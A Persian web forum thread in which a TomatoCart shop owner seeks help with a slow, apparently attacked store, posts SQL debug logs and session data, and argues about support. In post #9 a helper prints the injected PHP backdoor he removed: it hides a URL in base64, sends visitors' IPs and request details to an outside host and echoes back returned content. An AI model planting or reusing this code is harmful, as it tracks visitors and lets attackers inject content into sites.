صفحه 1 از 2 12 آخرینآخرین
نمایش نتایج: از شماره 1 تا 10 , از مجموع 12

موضوع: حمله به فروشگاه (باگهای امنیتی توماتو که انجمن رسمی توماتو فادر به پاسخگوییش نبود)

  1. #1

    تاریخ عضویت
    Nov 2014
    نوشته ها
    6
    تشکر
    4
    4 بار تشکر شده در 4 پست

    حمله به فروشگاه (باگهای امنیتی توماتو که انجمن رسمی توماتو فادر به پاسخگوییش نبود)

    حمله و اسپم به فروشگاه
    با سلام حدود چند ماه مي باشد که فروشگاه من زمان لود خيلي با سرعت پايين لود مي شود و اين فقط به سنگيني فروشگاه من ارتباطي ندارد , همچنين اکثر تمام مشتري هاي من از ورود و لود به سايت شکايت دارند . و با پشتيباني هاستم که تماس گرفتم بررسي کردن ديدن از هاست نيست و به سايتم حمله شده و بيشترين بازديد کننده ام نيز از کشور اکراين بوده پس از آن پشتيباني هاست برام يک سري آي پي اکراين برايم فرستاد تا deny شوند تا اين اتفاق افتاد براي حدود 2 ساعت سايت راحت بالا ميومد براي مثال دکمه افزودن به سبد خريد پس از صدم ثانيه به سبد خريد اضافه مي شد و الان اين پروسه حداقل 11 ثانيه و تاييد سفارش بعد از 20 ثانيه و ... طول مي کشد من نزديک به دو ماه مي باشد که هيچکدام از مشتريانم حتي نتونستند يک خريد انجام بدند و در ضمن در آن هاست چند فروشگاه ديگر نيز دارم که هيچ کدام از آن اين مشکل رو ندارند (يعني منظورم اين است که از هاست نمي باشد) و sql راکه نگاه کردم ديم فضاي آن از 20 مگابايت به پانصد مگابايت افزايش پيدا کرده (عکس آن پيوست مي باشد) و پس از آن اسپم ها را پاک کردم ولي باز سرعت همينجوريه. الان فقط آي پي ها ايران مي نونند به سايت برن چون محدود کردم که از خارج از کشور حمله نکنند . و سر شاخه ها در phpadmin که به آن حمله شد بود اينا بودند. البته کتاب مهمان را نيز غير فعال کردم.
    toc_gestbook------toc_administrators_log-------toc_sessions---------toc_wishlists_products--------toc_wishlists-toc-----banners_history


    اگه به سايتم برين متوجه ميشين.www.gamemaster.ir
    به نظر شما بايد چه کار کنم بيچاره شدم توي اين چند وقت انقدر وقت گذاشتم.؟؟؟؟؟؟؟؟؟؟؟؟


    و اين نيز گزارش کامل ماژول مشکل زدايي.


    This is a development version of TomatoCart (TomatoCart v1.1.5) - please use it for testing purposes only! [osC_Services_debug]
    [#2 - 0.00030s] select banners_id, date_scheduled from toc_banners where date_scheduled != ""
    [#3 - 0.00024s] select b.banners_id, b.expires_date, b.expires_impressions, sum(bh.banners_shown) as banners_shown from toc_banners b, toc_banners_history bh where b.status = 1 and b.banners_id = bh.banners_id group by b.banners_id
    [#4 - 0.00044s] select p.polls_id, p.polls_type, pd.polls_title from toc_polls p, toc_polls_description pd where p.polls_status = 1 and p.polls_id = pd.polls_id and pd.languages_id = 1
    [#5 - 0.00033s] select pa.polls_id, pa.polls_answers_id, pa.votes_count, pa.sort_order, pad.answers_title from toc_polls_answers pa, toc_polls_answers_description pad where pa.polls_id = 1 and pa.polls_answers_id = pad.polls_answers_id and pad.languages_id = 1 order by pa.sort_order desc
    [#6 - 0.00083s] select p.products_id, p.products_tax_class_id, p.products_price, pd.products_name, pd.products_keyword, i.image from toc_products p left join toc_products_images i on (p.products_id = i.products_id and i.default_flag = 1), toc_products_description pd where p.products_status = 1 and p.products_id = pd.products_id and pd.language_id = 1 order by p.products_date_added desc limit 5
    [#7 - 0.00027s] select banners_id from toc_banners where status = 1 and banners_group = 'banner1' order by rand() limit 1
    [#8 - 0.00033s] select * from toc_banners where banners_id = 4 and status = 1
    [#9 - 0.00030s] select count(*) as count from toc_banners_history where banners_id = 4 and date_format(banners_history_date, "%Y%m%d") = date_format(now(), "%Y%m%d")
    [#10 - 0.00024s] update toc_banners_history set banners_shown = banners_shown + 1 where banners_id = 4 and date_format(banners_history_date, "%Y%m%d") = date_format(now(), "%Y%m%d")
    [#11 - 0.00010s] select banners_id from toc_banners where status = 1 and banners_group = 'banner2' and banners_id not in (4) order by rand() limit 1
    [#12 - 0.00008s] select banners_id from toc_banners where status = 1 and banners_group = 'banner3' and banners_id not in (4) order by rand() limit 1
    [#13 - 0.00008s] select banners_id from toc_banners where status = 1 and banners_group = 'banner4' and banners_id not in (4) order by rand() limit 1
    [#14 - 0.00008s] select banners_id from toc_banners where status = 1 and banners_group = 'banner5' and banners_id not in (4) order by rand() limit 1
    [#15 - 0.00008s] select banners_id from toc_banners where status = 1 and banners_group = 'banner6' and banners_id not in (4) order by rand() limit 1
    [#16 - 0.00013s] select banners_id from toc_banners where status = 1 and banners_group = 'content1' and banners_id not in (4) order by rand() limit 1
    [#17 - 0.00009s] select banners_id from toc_banners where status = 1 and banners_group = 'content2' and banners_id not in (4) order by rand() limit 1
    [#18 - 0.00008s] select banners_id from toc_banners where status = 1 and banners_group = 'content3' and banners_id not in (4) order by rand() limit 1
    [#19 - 0.00008s] select banners_id from toc_banners where status = 1 and banners_group = 'content4' and banners_id not in (4) order by rand() limit 1
    [#20 - 0.00008s] select banners_id from toc_banners where status = 1 and banners_group = 'content5' and banners_id not in (4) order by rand() limit 1
    [#21 - 0.00008s] select banners_id from toc_banners where status = 1 and banners_group = 'content6' and banners_id not in (4) order by rand() limit 1
    [#22 - 0.00012s] select banners_id from toc_banners where status = 1 and banners_group = '468x60' and banners_id not in (4) order by rand() limit 1
    Number of queries: 22 [0s]
    [#23 - 0.00019s] select count(*) as total from toc_sessions where sesskey = '8f9a36fe1f975f88bad1dd53f99fea21'
    [#24 - 0.00034s] update toc_sessions set expiry = '1415873479', value = 'language|s:5:\"fa_IR\";currency|s:3:\"IRT\";osC_S hoppingCart_data|a:21:{s:8:\"contents\";a:7:{i:492 ;a:14:{s:2:\"id\";i:492;s:4:\"name\";s:41:\"Call of Duty: Advanced Warfare BurnerMax\";s:4:\"type\";s:1:\"0\";s:7:\"keyword\" ;N;s:3:\"sku\";s:0:\"\";s:5:\"image\";s:56:\"492_5 48_advanced warfare http://www.gamecover.com.br - copy.jpg\";s:5:\"price\";d:160000;s:11:\"final_pri ce\";d:160000;s:8:\"quantity\";i:2;s:6:\"weight\"; s:4:\"0.00\";s:12:\"tax_class_id\";s:1:\"0\";s:10: \"date_added\";s:18:\"????/??/??\";s:15:\"weight_class_id\";s:1:\"2\";s:7:\"gc_d ata\";N;}i:479;a:14:{s:2:\"id\";i:479;s:4:\"name\" ;s:39:\"Crimes and Punishments: Sherlock Holmes\";s:4:\"type\";s:1:\"0\";s:7:\"keyword\";N; s:3:\"sku\";s:0:\"\";s:5:\"image\";s:33:\"479_534_ 0081429001268_500x500.jpg\";s:5:\"price\";d:90000; s:11:\"final_price\";d:90000;s:8:\"quantity\";i:1; s:6:\"weight\";s:4:\"0.00\";s:12:\"tax_class_id\"; s:1:\"0\";s:10:\"date_added\";s:18:\"????/??/??\";s:15:\"weight_class_id\";s:1:\"2\";s:7:\"gc_d ata\";N;}i:494;a:14:{s:2:\"id\";i:494;s:4:\"name\" ;s:33:\"Far Cry 3: Blood Dragon BurnerMax\";s:4:\"type\";s:1:\"0\";s:7:\"keyword\" ;N;s:3:\"sku\";s:0:\"\";s:5:\"image\";s:50:\"494_5 50_far cry 3 blood dragon xbox 360 - copy.png\";s:5:\"price\";d:90000;s:11:\"final_pric e\";d:90000;s:8:\"quantity\";i:2;s:6:\"weight\";s: 4:\"0.00\";s:12:\"tax_class_id\";s:1:\"0\";s:10:\" date_added\";s:18:\"????/??/??\";s:15:\"weight_class_id\";s:1:\"2\";s:7:\"gc_d ata\";N;}i:473;a:14:{s:2:\"id\";i:473;s:4:\"name\" ;s:15:\"Forza Horizon 2\";s:4:\"type\";s:1:\"0\";s:7:\"keyword\";N;s:3:\ "sku\";s:0:\"\";s:5:\"image\";s:55:\"473_526_f orza-horizon-2-2014-pal--front-cover-94076.jpg\";s:5:\"price\";d:59000;s:11:\"final_pri ce\";d:59000;s:8:\"quantity\";i:1;s:6:\"weight\";s :4:\"0.00\";s:12:\"tax_class_id\";s:1:\"0\";s:10:\ "date_added\";s:18:\"????/??/??\";s:15:\"weight_class_id\";s:1:\"2\";s:7:\"gc_d ata\";N;}i:474;a:14:{s:2:\"id\";i:474;s:4:\"name\" ;s:30:\"Middle Earth: Shadow of Mordor\";s:4:\"type\";s:1:\"0\";s:7:\"keyword\";N; s:3:\"sku\";s:0:\"\";s:5:\"image\";s:52:\"474_525_ _-middle-earth-shadow-of-mordor-pc-_ (1).jpg\";s:5:\"price\";d:225000;s:11:\"final_pric e\";d:225000;s:8:\"quantity\";i:1;s:6:\"weight\";s :4:\"0.00\";s:12:\"tax_class_id\";s:1:\"0\";s:10:\ "date_added\";s:18:\"????/??/??\";s:15:\"weight_class_id\";s:1:\"2\";s:7:\"gc_d ata\";N;}i:491;a:14:{s:2:\"id\";i:491;s:4:\"name\" ;s:32:\"Sleeping Dogs Definitive Edition\";s:4:\"type\";s:1:\"0\";s:7:\"keyword\";N ;s:3:\"sku\";s:0:\"\";s:5:\"image\";s:60:\"491_547 _sleeping dogs definitive edition pc game-275x350.jpg\";s:5:\"price\";d:100000;s:11:\"final_ price\";d:100000;s:8:\"quantity\";i:1;s:6:\"weight \";s:4:\"0.00\";s:12:\"tax_class_id\";s:1:\"0\";s: 10:\"date_added\";s:18:\"????/??/??\";s:15:\"weight_class_id\";s:1:\"2\";s:7:\"gc_d ata\";N;}i:493;a:14:{s:2:\"id\";i:493;s:4:\"name\" ;s:20:\"WWE 2K15 BurnerMax\";s:4:\"type\";s:1:\"0\";s:7:\"keyword\" ;N;s:3:\"sku\";s:0:\"\";s:5:\"image\";s:15:\"493_5 49_big.jpg\";s:5:\"price\";d:90000;s:11:\"final_pr ice\";d:90000;s:8:\"quantity\";i:1;s:6:\"weight\"; s:4:\"0.00\";s:12:\"tax_class_id\";s:1:\"0\";s:10: \"date_added\";s:18:\"????/??/??\";s:15:\"weight_class_id\";s:1:\"2\";s:7:\"gc_d ata\";N;}}s:14:\"sub_total_cost\";d:1064000;s:10:\ "total_cost\";d:1084000;s:12:\"total_weight\";d:0; s:3:\"tax\";d:0;s:16:\"is_gift_wrapping\";b:0;s:10 :\"tax_groups\";a:1:{s:32:\"نرخ ماليات نامشخص\";d:0;}s:11:\"coupon_code\";N;s:13:\" coupon_amount\";i:0;s:22:\"gift_certificate_codes\ ";a:0:{}s:30:\"gift_certificate_redeem_amount\";a: 0:{}s:15:\"customer_credit\";i:0;s:19:\"use_custom er_credit\";b:0;s:21:\"shipping_boxes_weight\";d:3 ;s:14:\"shipping_boxes\";i:1;s:16:\"shipping_addre ss\";a:2:{s:7:\"zone_id\";s:4:\"1543\";s:10:\"coun try_id\";s:3:\"101\";}s:15:\"shipping_method\";a:5 :{s:2:\"id\";s:11:\"table_table\";s:5:\"title\";s: 144:\"هزينه ارسال توسط پيک موتوري(فقط تهران) : (بهترين روش براي مشتريان ساکن شهر تهران)\";s:4:\"cost\";i:20000;s:12:\"tax_clas s_id\";s:1:\"0\";s:11:\"is_cheapest\";b:1;}s:15:\" billing_address\";a:2:{s:7:\"zone_id\";s:4:\"1543\ ";s:10:\"country_id\";s:3:\"101\";}s:14:\"billing_ method\";a:0:{}s:15:\"shipping_quotes\";a:2:{i:0;a :4:{s:2:\"id\";s:5:\"table\";s:6:\"module\";s:71:\ "هزينه ارسال توسط پيک موتوري(فقط تهران) :\";s:7:\"methods\";a:1:{i:0;a:3:{s:2:\"id\";s:5:\ "table\";s:5:\"title\";s:70:\"بهترين روش براي مشتريان ساکن شهر تهران\";s:4:\"cost\";i:20000;}}s:12:\"tax_cla ss_id\";s:1:\"0\";}i:1;a:4:{s:2:\"id\";s:4:\"flat\ ";s:6:\"module\";s:19:\"پست پيشتاز\";s:7:\"methods\";a:1:{i:0;a:3:{s:2:\ "id\";s:4:\"flat\";s:5:\"title\";s:68:\"بهتري ن روش براي مشتريان در شهرستان ها\";s:4:\"cost\";s:5:\"60000\";}}s:12:\"tax_cla ss_id\";s:1:\"0\";}}s:12:\"order_totals\";a:3:{i:0 ;a:6:{s:4:\"code\";s:9:\"sub_total\";s:5:\"title\" ;s:14:\"زير جمع:\";s:4:\"text\";s:23:\"106,400 تومان\";s:5:\"value\";d:1064000;s:3:\"tax\";d :-1064000;s:10:\"sort_order\";s:2:\"10\";}i:1;a:6:{s :4:\"code\";s:20:\"shipping-table_table\";s:5:\"title\";s:145:\"هزينه ارسال توسط پيک موتوري(فقط تهران) : (بهترين روش براي مشتريان ساکن شهر تهران):\";s:4:\"text\";s:21:\"2,000 تومان\";s:5:\"value\";i:20000;s:3:\"tax\";d:0 ;s:10:\"sort_order\";s:2:\"20\";}i:2;a:6:{s:4:\"co de\";s:5:\"total\";s:5:\"title\";s:7:\"جمع:\";s :4:\"text\";s:30:\"108,400 تومان\";s:5:\"value\";d:1084000;s:3:\"tax\";d :-1084000;s:10:\"sort_order\";s:2:\"80\";}}}cartID|s :5:\"79927\";toC_Wishlist_data|a:3:{s:8:\"contents \";a:0:{}s:12:\"wishlists_id\";N;s:5:\"token\";N;} toC_Compare_Products_data|a:0:{}toC_Customization_ Fields_data|a:1:{s:8:\"contents\";a:0:{}}osC_Navig ationHistory_data|a:1:{i:0;a:4:{s:4:\"page\";s:9:\ "index.php\";s:4:\"mode\";s:6:\"NONSSL\";s:3:\"get \";a:0:{}s:4:\"post\";a:0:{}}}template|a:2:{s:2:\" id\";s:1:\"5\";s:4:\"code\";s:10:\"White_Cart\";}o sC_NavigationHistory_snapshot|a:4:{s:4:\"page\";s: 12:\"checkout.php\";s:4:\"mode\";s:6:\"NONSSL\";s: 3:\"get\";a:1:{s:8:\"checkout\";s:0:\"\";}s:4:\"po st\";a:0:{}}' where sesskey = '8f9a36fe1f975f88bad1dd53f99fea21'
    Execution Time: 16.054s [osC_Services_debug]Untitled.png
    ویرایش توسط mostafa3000 : 2015-01-20 در ساعت 00:21

  2. #2

    تاریخ عضویت
    Apr 2010
    نوشته ها
    75
    تشکر
    17
    67 بار تشکر شده در 40 پست
    دوست عزیز خیلی راحت میشه جلوشو گرفت
    یه اسکریپته احتمالا داره دیتابیسو پر میکنه ...

    و یه چیز دیگه هم که دیدم این بود "order by rand() limit 1"
    order by rand توی دیتابیس های حجم بالا خیلی کند عمل میکنه و بعضی وقتا هم باعث داون شده mysql میشه !!

    شما برید توی phpmyadmin و این sql رو اجرا کنید ببینید نتیجه چیه

    کد:
    show processlist

  3. کاربران زیر به خاطر این پست از be099 تشکر کرده اند :


  4. #3

    تاریخ عضویت
    Nov 2014
    نوشته ها
    6
    تشکر
    4
    4 بار تشکر شده در 4 پست
    ممنون دوست عزیز اجرا کردم این اومد :

    Capture.JPG

    این پست توسط عبارت زیر به روز شده است :

    ممنون دوست عزیز اجرا کردم این اومد :

    Capture.JPG

    واین چی هست "order by rand() limit 1" و باید چه کار کنم تا برطرف بشه.

  5. کاربر زیر به خاطر این پست از mostafa3000 تشکر کرده است :


  6. #4

    تاریخ عضویت
    Apr 2010
    نوشته ها
    75
    تشکر
    17
    67 بار تشکر شده در 40 پست
    هیچ فشاری روی دیتابیس نیست که !
    order by rand() یک دستور sql هست که یک مقدار تصادفی از دیتا بیس انتخاب میکنه و توی کد های بالا من دیدم
    و توی حجم بالا فشار خیلی زیادی میاره
    ولی الان هیچ فشاری روی دیتابیس شما نیست !
    مشکلتون باید از جای دیگه باشه !

  7. کاربر زیر به خاطر این پست از be099 تشکر کرده است :


  8. #5

    تاریخ عضویت
    Nov 2014
    نوشته ها
    6
    تشکر
    4
    4 بار تشکر شده در 4 پست
    به نظرتون از چی میتونه باشه الان فشاری نیست چون که آی پی ها را محدود به ایران کردم من احتمال می دم توی دیتابیس دست بردند یا هک کردن که اینجوری شده. 6 روز پیش برای حدود چند ساعت عالی شده بود بطور مثال تا قبل از اینکه سرعت سایتم بیاد پایین وقتی روی دکمه افزودن به سبد خرید کلیک میکردیم مانند تکنولوژی آجاکس محصول پرتاب میشد اما الان بعد از زدن دکمه با سرعت خیلی پایین وارد صفحه سبد خرید میشه.....

    لطفا سایتم چک کنید خودتان متوجه می شوید.

  9. کاربر زیر به خاطر این پست از mostafa3000 تشکر کرده است :


  10. #6

    تاریخ عضویت
    Apr 2010
    نوشته ها
    75
    تشکر
    17
    67 بار تشکر شده در 40 پست
    فکر نمیکنم مشکل از سرور باشه چون چند سایت که ظاهرا روی همین سرور هستند رو چک کردم مشکلی نبود

    مثلا iranvilla.ir
    کد:
    URL tested:	http://iranvilla.ir/
    Test performed from:	New York, NY
    Test performed at:	2014-11-12 10:58:21 (GMT +00:00)
    Resolved As:	5.9.68.186
    Status:	OK
    Response Time:	0.557 sec
    DNS:	0.002 sec
    Connect:	0.086 sec
    Redirect:	0.000 sec
    First byte:	0.296 sec
    Last byte:	0.173 sec
    Size:	20883 bytes
    حتی قسمت ادمین سایتتون هم خوب میاد
    http://gamemaster.ir/admin

    سایتتون باید بررسی بشه
    در صورتی که مایل بودید مشخصاتتونو بفرستید تا بررسی کنم ...

  11. کاربران زیر به خاطر این پست از be099 تشکر کرده اند :


  12. #7
    B.A.H.M.A.N آواتار ها
    تاریخ عضویت
    May 2013
    نوشته ها
    460
    تشکر
    311
    1,149 بار تشکر شده در 377 پست
    نقل قول نوشته اصلی توسط mostafa3000 نمایش پست ها
    حمله و اسپم به فروشگاه

    (و کسانی که می خواهد فروشگاه ساز توماتو رو انتخاب کنند بدانند که نه امنیت درست و حسابی داره و نه پشتیبانی از طرف انجمن، اگر برای وقت و هزینه خودتون نمی سوزه به اعصاب و روان خودتون رحم کنید.)
    هر اسکریپتی مشکلاتی داره ، یه سری باگ داره ، انجمن پشتیبانی فارسی توماتو ، مسئولیتی که داره اینه که بومی سازی رو ساپورت کنه ، هیچ وظیفه ای در رفع باگ خود اسکریپت نداره ، چون رفع باگ و پشتیبانی در مورد این باگ ها و ... وظیفه و کار انجمن اصلی سازنده این اسکریپت هست . این حرف شما شاید باعث بشه یه عده ذهنیت نادرست نسبت به فروشگاه ساز توماتو پیدا کنن ، شما عصبانی هستین فعلا و به دنبال رفع مشکلتون ، در این مواقع حرفایی که آدم میزنه یه جورایی میتونه توش اشتباه هم راه داشته باشه .
    با کمک دوستان فعال فروشگاه ساز توماتو ، انشالله مشکلتون حل میشه .
    تشکر



  13. کاربران زیر به خاطر این پست از B.A.H.M.A.N تشکر کرده اند :


  14. #8

    تاریخ عضویت
    Nov 2014
    نوشته ها
    6
    تشکر
    4
    4 بار تشکر شده در 4 پست

    حمله به فروشگاه

    نقل قول نوشته اصلی توسط B.A.H.M.A.N نمایش پست ها
    هر اسکریپتی مشکلاتی داره ، یه سری باگ داره ، انجمن پشتیبانی فارسی توماتو ، مسئولیتی که داره اینه که بومی سازی رو ساپورت کنه ، هیچ وظیفه ای در رفع باگ خود اسکریپت نداره ، چون رفع باگ و پشتیبانی در مورد این باگ ها و ... وظیفه و کار انجمن اصلی سازنده این اسکریپت هست . این حرف شما شاید باعث بشه یه عده ذهنیت نادرست نسبت به فروشگاه ساز توماتو پیدا کنن ، شما عصبانی هستین فعلا و به دنبال رفع مشکلتون ، در این مواقع حرفایی که آدم میزنه یه جورایی میتونه توش اشتباه هم راه داشته باشه .
    با کمک دوستان فعال فروشگاه ساز توماتو ، انشالله مشکلتون حل میشه .
    تشکر
    نقل قول نوشته اصلی توسط B.A.H.M.A.N نمایش پست ها
    هر اسکریپتی مشکلاتی داره ، یه سری باگ داره ، انجمن پشتیبانی فارسی توماتو ، مسئولیتی که داره اینه که بومی سازی رو ساپورت کنه ، هیچ وظیفه ای در رفع باگ خود اسکریپت نداره ، چون رفع باگ و پشتیبانی در مورد این باگ ها و ... وظیفه و کار انجمن اصلی سازنده این اسکریپت هست . این حرف شما شاید باعث بشه یه عده ذهنیت نادرست نسبت به فروشگاه ساز توماتو پیدا کنن ، شما عصبانی هستین فعلا و به دنبال رفع مشکلتون ، در این مواقع حرفایی که آدم میزنه یه جورایی میتونه توش اشتباه هم راه داشته باشه .
    با کمک دوستان فعال فروشگاه ساز توماتو ، انشالله مشکلتون حل میشه .
    تشکر

    آخه من مشکل ام اینه پشتیبانی که باید در این مواقع کاربر رو راهنمایی کنه افرادی به اصطلاح مدیر مانند sajad1441 این در انجمن توماتو به جای این که جواب سوال رو بده فقط دنبال اینه که ببینه چطوری میشه از پاسخگویی فرار کنه یا سوادشو نداره یا نمیدونم والا . خدایش فروشگاه رو بری ببینی ، می بینی که کپی رایت و رعایت کردم و عبارت (قدرت یافته توسط توماتو فارسی) اون پایین سایتم هست فقط لینک نشده اونم چون همون اولا سهوا لینک و پاک کرده بودم دیگه نتونستم دستوری که به لینک سایتشان مراجعه کند را پیدا کنم و جالب این که اکثرا این کپی رایت خشک و خالی رو هم ندارند و حتی پیش خودش فکر نکرده حالا اگر کسی بخواد از طریق سایت من بره تو فروشگاهشون می تونه تو گوگل سرچ کنه توماتو حالا حتما که نباید از طریق لینک هدایت بشه و اگه شما کمی تو انجمن جستجو کنی می بینی که غریب به اتفاق به همه همینا رو می گه و از جواب گفتن طفره می ره و جالب این که قبلا سوال که پیش اومده بود برام را با نظر به همین وضعیت آقای معصومی مدیر کل انجمن جوابمو کامل داده بودند (میگن شاه می‌بخشه ولی شاه قلی نمی‌بخشه.) و وجود امثال این آدم در انجمن می تونه انجمنو بدنام کنه و دیگر اینه که ازش سوال می کنی منظور دقیقتون از تغییرات چیه مثل این که داری با دیوار صحبت می کنی و پست رو می بنه.


    نه خدایش شما بودی شاکی نمی شودی. من بیشتر از این که از اون هکر خارجی که ناراحت بشم از این موضوع نارحتم.
    ویرایش توسط mostafa3000 : 2014-11-12 در ساعت 17:21

  15. کاربر زیر به خاطر این پست از mostafa3000 تشکر کرده است :


  16. #9

    تاریخ عضویت
    Apr 2010
    نوشته ها
    75
    تشکر
    17
    67 بار تشکر شده در 40 پست
    دوست عزیز مشکل سایت شمارو بررسی کردم و برطرف شد
    ظاهرا یک کدی توی بعضی قسمت های سایتتون ایجاد شده بود که آی پی و یوزر ایجنت و آدرس دامین شمارو ارسال میکرد به سرویسی که منقضی شده ... و همین باعث تاخیر 8 ثانیه ای توی هر بار اجرای کد شما میشد که باعث کندی شدید سایت شما میشد
    من با توماتو شاپ اصلا آشنایی ندارم و نمیشناسم ولی اینو بدونید که موضوع احتمالا از امنیت پایین هاست شماست نه اسکریپت

    پیشنهاد من اینه که بکاپ تهیه کنید و cms دوباره روی هاست جدید نصب کنید


    کد مخرب :

    کد:
    <?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
            $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                @$stCurlHandle = curl_init( $stCurlLink ); 
        }
        } 
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
        $sResult = @curl_exec($stCurlHandle); 
        if ($sResult[0]=="O") 
         {$sResult[0]=" ";
          echo $sResult; // Statistic code end
          }
        curl_close($stCurlHandle); 
    }
    }
    ?>
    این پست توسط عبارت زیر به روز شده است :

    کد:
    Website test results
    
    URL tested:	http://gamemaster.ir/index.php?index
    Test performed from:	New York, NY
    Test performed at:	2014-11-13 20:27:01 (GMT +00:00)
    Resolved As:	5.9.68.186
    Status:	OK
    Response Time:	0.531 sec
    DNS:	0.002 sec
    Connect:	0.087 sec
    Redirect:	0.000 sec
    First byte:	0.185 sec
    Last byte:	0.257 sec
    Size:	55777 bytes
    
    
    URL tested:	http://gamemaster.ir/products.php?507
    Test performed from:	New York, NY
    Test performed at:	2014-11-13 20:27:47 (GMT +00:00)
    Resolved As:	5.9.68.186
    Status:	OK
    Response Time:	0.463 sec
    DNS:	0.002 sec
    Connect:	0.086 sec
    Redirect:	0.000 sec
    First byte:	0.201 sec
    Last byte:	0.174 sec
    Size:	34473 bytes

  17. کاربران زیر به خاطر این پست از be099 تشکر کرده اند :


  18. #10

    تاریخ عضویت
    Nov 2014
    نوشته ها
    6
    تشکر
    4
    4 بار تشکر شده در 4 پست
    مشکل توسط دوست و کاربر عزیز be099 حل شد.

  19. کاربر زیر به خاطر این پست از mostafa3000 تشکر کرده است :


صفحه 1 از 2 12 آخرینآخرین

موضوعات مشابه

  1. به نظرتون یه همچین سایتی میتونه تو ایران موفق بشه ؟؟
    توسط Rahaatdownload در انجمن ایده پروری ، ایده یابی و ایده پردازی
    پاسخ ها: 6
    آخرين نوشته: 2017-03-13, 19:59
  2. خریدار سشوار و اتو مو رمینگتون
    توسط baraneshop در انجمن سایر محصولات و کالاها
    پاسخ ها: 3
    آخرين نوشته: 2014-07-27, 01:10
  3. با 500.000 تومان چند تا تبلیغ می تونم بدم تو گوگل
    توسط bahram در انجمن تبلیغات اینترنتی و بازاریابی آنلاین
    پاسخ ها: 15
    آخرين نوشته: 2011-07-15, 18:18
  4. پاسخ ها: 0
    آخرين نوشته: 2010-08-08, 14:41

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید
  • شما نمیتوانید پست های خود را ویرایش کنید
  •